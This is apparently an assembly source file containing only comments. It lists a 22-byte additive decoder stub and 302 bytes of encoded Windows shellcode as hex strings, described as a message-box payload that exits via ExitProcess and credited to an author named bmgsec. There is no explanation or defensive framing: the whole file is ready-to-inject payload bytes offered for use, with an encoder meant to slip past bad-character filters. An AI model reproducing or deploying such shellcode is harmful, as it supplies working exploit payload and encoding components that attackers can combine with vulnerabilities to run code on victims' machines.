; dynamicmsg.asm
;
; Dynamic Message Box (302 bytes)
;
; //Additive decoder, 22 bytes [ bmgsec.com.au ]
; "\xeb\x0f\x5e\x31\xc9\x66\xb9\x2e\x01\x80\x06\x02\x46\xe2\xfa\xeb"
; "\x05\xe8\xec\xff\xff\xff"
;
; //Dynamic Message Box Shellcode, 302 bytes, exitMethod=ExitProcess [ bmgsec.com.au ]
; "\x2f\xbe\x2f\xd9\x2f\xc7\x2f\xd0\xe7\x9a\xfe\xfe\xfe\x54\x2f\xbe"
; "\x62\x89\x3e\x2e\x83\xbe\x76\x0a\x89\x3e\x0a\x89\x6e\x1a\xab\x89"
; "\x3e\x06\xe9\x07\x89\x3e\x32\x8b\x3e\x7a\x89\x3e\x3a\x5c\xc1\x5e"
; "\x89\x6a\x22\x22\x89\x43\x3a\x89\x52\x03\x76\xff\xe8\x89\x48\x16"
; "\x89\x58\x1e\xff\xe9\xe1\x32\x47\x89\x32\x89\xff\xec\x2f\xfd\x2f"
; "\xbe\xfa\xaa\x82\xbe\x72\x05\xbf\xcd\x0b\xff\xc5\xe9\xf2\x39\x7a"
; "\x22\x26\x73\xdf\x89\x58\x22\xff\xe9\x64\x89\x0a\x49\x89\x58\x1a"
; "\xff\xe9\x89\x02\x89\xff\xe6\x87\x42\x22\x1a\x5f\xc1\xab\x4e\x50"
; "\xe6\xa8\xfd\xfd\xfd\x87\x05\x7f\xc2\x06\xfe\xfe\xfe\x7f\xc5\x02"
; "\xfe\xfe\xfe\x37\xcc\x73\xe4\xc1\xe6\x1b\xfe\xfe\xfe\x8c\x4c\x0c"
; "\xea\x7c\xd6\xe0\x71\xa6\xa0\x4b\xba\x7f\xea\x06\xfe\xfe\xfe\x87"
; "\xe3\xe6\x55\xfd\xfd\xfd\x87\xc0\xe9\xdc\x5c\x8b\x7b\x02\x87\xef"
; "\x7f\xbf\x06\xfe\xfe\xfe\xe6\xb0\xfd\xfd\xfd\xe9\x37\x56\x2f\xd0"
; "\x86\x4e\x08\x7f\xbf\x02\xfe\xfe\xfe\x4f\x50\x4e\xfd\x53\x02\x58"
; "\x57\x87\xc0\xe6\x93\xfd\xfd\xfd\xe9\x2a\x59\x2f\xd0\x86\x51\x04"
; "\xe9\x2e\x57\x2f\xd0\x86\x4f\x03\x2f\xd0\x50\x51\x4f\x50\xfd\xce"
; "\x2f\xbe\x4e\xfd\x53\x06\xe6\xc0\xfd\xfd\xfd\x73\x71\x63\x70\x31"
; "\x30\x2c\x62\x6a\x6a\x4c\xe6\xcd\xfd\xfd\xfd\x60\x6b\x65\x71\x63"
; "\x61\x4c\xe6\xc9\xfd\xfd\xfd\x77\x5f\x66\x66\x66\x4c\xfd";
;
; Written by bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)